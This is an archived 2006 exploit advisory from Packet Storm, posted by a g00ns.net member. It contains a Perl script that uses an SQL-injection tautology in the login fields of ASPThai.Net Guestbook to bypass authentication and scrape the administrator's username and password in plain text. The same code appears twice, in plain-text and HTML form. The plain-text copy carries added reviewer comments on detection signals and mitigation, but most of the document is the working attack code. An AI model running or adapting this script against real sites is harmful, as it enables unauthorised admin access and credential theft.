ASPThai.NetGuestbook.pl.txt

2006-02-08T00:00:00
ID PACKETSTORM:43637
Type packetstorm
Reporter MurderSkillz
Modified 2006-02-08T00:00:00

Description

                                        
------=_Part_9669_22649246.1139201383091
Content-Type: text/plain; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
I, MurderSkillz from g00ns.net, found a vuln: "SQL Injection Exploit for
ASPThai.Net Guestbook <= 5.5 and POSSIBLY higher". The SQL injection takes
place in admin.asp. If special characters are injected into the login it
will grant you admin, but we wrote some code to grab the plaintext user
and pass. Here is the code:
  
  
#!/usr/bin/perl  
# SQL Injection Exploit for ASPThai.Net Guestbook <=3D 5.5  
#(And possible higher could not find a site to test it on)  
# This exploit shows the username of the administrator and the password In  
plain text  
# Bug Found by muderskillz Coded by Zodiac  
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and  
anyone else I forgot.  
# http://exploitercode.com/ http://www.g00ns.net  
#irc.g00ns.net #g00ns email =3D zodiac@g00ns.net  
#(c) 2006  
  
use LWP::UserAgent;  
use HTTP::Cookies;  
  
  
# Review notes (defender's view of the script below).
# As written it: reads a base URL from @ARGV, prints a banner, POSTs a
# login form to check_user.asp whose two credential fields carry a
# quote-prefixed OR tautology, then GETs change_admin_username.asp with an
# admin_menu.asp Referer and scrapes the first two value="..." attributes
# out of that page.
# Detection signals visible in this file: the fixed User-Agent string
# 'g00ns'; a POST to check_user.asp whose txtUserName/txtUserPass values
# begin with a single quote and an OR clause; and a GET of
# change_admin_username.asp immediately after that POST from one client.
# Application-side mitigation: parameterised queries in the login check
# and a server-side session check on every admin page, rather than
# trusting the login round-trip or the Referer header.
# The advisory text names admin.asp as the injection point; the script
# itself posts to check_user.asp.
# No `use strict`: $Server, $xpl, $cookie_jar, $res, $info, $User and
# $Pass are package globals.
$Server =3D $ARGV[0];  
  
# Presumably meant to make sure $Server carries an http scheme -- TODO
# confirm. $error is never assigned in this file, so the else branch
# prints an undefined value.
if($Server =3D~m/http/g)  
{  
$Server=3D~ 'http://$Server';  
print  
}  
  
else {  
print $error;  
}  
  
  
  
  
# No argument: usage() prints the help text and exits itself, so the
# exit() here is never reached.
if(!$Server) {usage();exit() ;}  
  
head();  
  
  
  
print "\r\nGrabbing Username And Password\r\n\n";  
  
  
  
#Login's and stores a cookie to view admin panel later  
  
  
# LWP client with a cookie jar, so whatever cookie the login POST sets is
# sent on the following request. The User-Agent is hard-coded to 'g00ns'.
$xpl =3D LWP::UserAgent->new() or die;  
$cookie_jar =3D HTTP::Cookies->new();  
  
$xpl->agent('g00ns');  
$xpl->cookie_jar($cookie_jar);  
  
# Login POST: both credential fields carry the same injected value; the
# response is stored in the global $res but never inspected.
$res =3D $xpl->post(  
$Server.'check_user.asp',  
Content =3D> [  
  
  
'txtUserName' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30%6e%73',  
'txtUserPass' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30%6e%73',  
'Submit' =3D> '-=3D Login =3D-',  
],  
);  
  
  
  
# Create a request  
# Second request: the admin page, with a Referer pointing at
# admin_menu.asp. This `my $res` shadows the global $res above.
my $req =3D HTTP::Request->new(GET =3D>  
  
$Server.'change_admin_username.asp'  
  
);  
  
$req->header('Referer', $Server.'admin_menu.asp');  
  
  
  
my $res =3D $xpl->request($req);  
  
$info=3D $res->content;  
  
# Treat an access-denied or not-found page as failure.
if($info =3D~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/)  
{  
die "Error Connecting...\r\n";  
}  
  
  
  
  
#Check the outcome of the response  
  
  
  
# Two scalar-context m//g matches on the same string: the second one
# resumes from pos($info), so $2 of the first match is the run of text
# following the first value=" in the page and $2 of the second the run
# following the second value=".
$info=3D~m/(value=3D\")(\n+|\w+|\W+)/g;  
$User =3D $2;  
$info=3D~m/(value=3D\")(\n+|\w+|\W+)/g;  
$Pass=3D $2;  
  
  
# Whatever was scraped is printed verbatim.
print "UserName:$User\r\nPassword:$Pass\r\n";  
  
  
  
# Prints the three-line banner shown before the script's output.
# NOTE(review): this listing is quoted-printable encoded as captured
# ('=3D' stands for '=', a bare '=' at end of line is a soft line break),
# so the strings below are reproduced as transmitted rather than decoded.
# The empty prototype on `sub head()` is not argument validation.
sub head()  
{  
print  
"\n=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";  
# This literal spans two physical lines, so the newline and trailing
# spaces after "by" are part of the printed text.
print "* ASPThai.Net Guestbook version 5.5 SQL Injection by  
www.g00ns.net*\r\n";  
print  
"=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";  
}  
# Prints the banner plus usage text and terminates the process.
# Called from the top level when no site argument was given; because it
# ends with exit(), control never returns to the caller.
# NOTE(review): strings are quoted-printable encoded as captured ('=3D'
# is '=', a trailing '=' is a soft line break) and are left as transmitted.
sub usage()  
{  
head();  
print " Usage: Thaisql.pl <Site> \r\n\n";  
# Literal spans two physical lines; the embedded newline is printed.
print " <Site> - Full path to Guestbook e.g.  
http://www.site.com/guestbook/\r\n";  
print  
"=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";  
print " -=3DCoded by Zodiac, Bug Found by MurderSkillz=3D-\r\n";  
print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";  
print  
"=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";  
# Terminates the script; the caller's own exit() is therefore unreachable.
exit();  
}  
  
  
  
It's been out for about 2 days now.
  
------=_Part_9669_22649246.1139201383091  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
<div>I, MurderSkillz from <a href="http://g00ns.net">g00ns.net</a>, found a vuln: "SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5 and POSSIBLY higher". The SQL injection takes place in admin.asp. If special characters are injected into the login it will grant you admin, but we wrote some code to grab the plaintext user and pass. Here is the code:
</div>
<div> </div>  
<div>  
<p>#!/usr/bin/perl<br># SQL Injection Exploit for ASPThai.Net Guestbook &lt=  
;=3D 5.5  <br>#(And possible higher could not find a site to test it o=  
n)<br># This exploit shows the username of the administrator and the passwo=  
rd In plain text  
<br># Bug Found by muderskillz Coded by Zodiac<br># Shouts to cijfer,uid0,|=  
n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.<br># <=  
a href=3D"http://exploitercode.com/">http://exploitercode.com/</a> <a href=  
=3D"http://www.g00ns.net/">  
http://www.g00ns.net</a> <br>#irc.g00ns.net #g00ns  email =3D <a href=  
=3D"mailto:zodiac@g00ns.net">zodiac@g00ns.net</a><br>#(c) 2006</p>  
<p>use LWP::UserAgent;<br>use HTTP::Cookies;</p>  
<p><br>$Server =3D $ARGV[0];</p>  
<p>if($Server =3D~m/http/g)<br>{<br>$Server=3D~ 'http://$Server';<br>print =  
<br>}</p>  
<p>else {<br>  print $error;<br>}</p>  
<p> </p>  
<p><br>if(!$Server) {usage();exit() ;}</p>  
<p>head();</p>  
<p> </p>  
<p>print "\r\nGrabbing Username And Password\r\n\n";</p>  
<p> </p>  
<p>#Login's and stores a cookie to view admin panel later</p>  
<p><br> $xpl =3D LWP::UserAgent->new() or die;<br> $cookie_jar=  
=3D HTTP::Cookies->new();</p>  
<p> $xpl->agent('g00ns');<br> $xpl->cookie_jar($cookie_jar)=  
;</p>  
<p> $res =3D $xpl->post(<br> $Server.'check_user.asp',<br>&nbs=  
p;Content =3D> [ </p>  
<p><br> 'txtUserName' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30=  
%6e%73', <br> 'txtUserPass' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67=  
%30%30%6e%73',<br> 'Submit' =3D> '-=3D Login =3D-',<br> ],<br>=  
 );</p>  
<p> </p>  
<p># Create a request<br>my $req =3D HTTP::Request->new(GET =3D> </p>  
<p>$Server.'change_admin_username.asp'</p>  
<p>);</p>  
<p>$req->header('Referer', $Server.'admin_menu.asp');</p>  
<p> </p>  
<p>my $res =3D $xpl->request($req);</p>  
<p>$info=3D $res->content;</p>  
<p>if($info =3D~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/) <br>=  
{ <br> die "Error Connecting...\r\n"; <br>}</p>  
<p> </p>  
<p><br>#Check the outcome of the response</p>  
<p> </p>  
<p>$info=3D~m/(value=3D\")(\n+|\w+|\W+)/g;<br>$User =3D $2;<br>$info=  
=3D~m/(value=3D\")(\n+|\w+|\W+)/g;<br>$Pass=3D $2;</p>  
<p><br>print "UserName:$User\r\nPassword:$Pass\r\n";</p>  
<p> </p>  
<p>sub head()<br> {<br> print "\n=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";<br> print "* ASPT=  
hai.Net Guestbook version 5.5 SQL Injection by <a href=3D"http://www.g00ns.=  
net/">  
www.g00ns.net</a> *\r\n";   <br> print "=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";<br> =  
}<br>sub usage()<br> {<br> head();<br> print " Usage: T=  
haisql.pl <Site>  \r\n\n";  
<br> print " <Site> - Full path to Guestbook e.g. <a href=  
=3D"http://www.site.com/guestbook/">http://www.site.com/guestbook/</a> \r\n=  
";<br> print "=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D\r\n";  
<br> print "   -=3DCoded by Zodiac, Bug Found by Murder=  
Skillz=3D-\r\n";<br> print "<a href=3D"http://www.exploiterc=  
ode.com/">www.exploitercode.com</a> <a href=3D"http://www.g00ns.net/">www.g=  
00ns.net</a> <a href=3D"http://irc.g00ns.net">  
irc.g00ns.net</a> #g00ns\r\n";<br> print "=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";<br> exit();<b=  
r> }</p>  
<p> </p>  
<p>It's been out for about 2 days now.<br> </p></div>
  
------=_Part_9669_22649246.1139201383091--  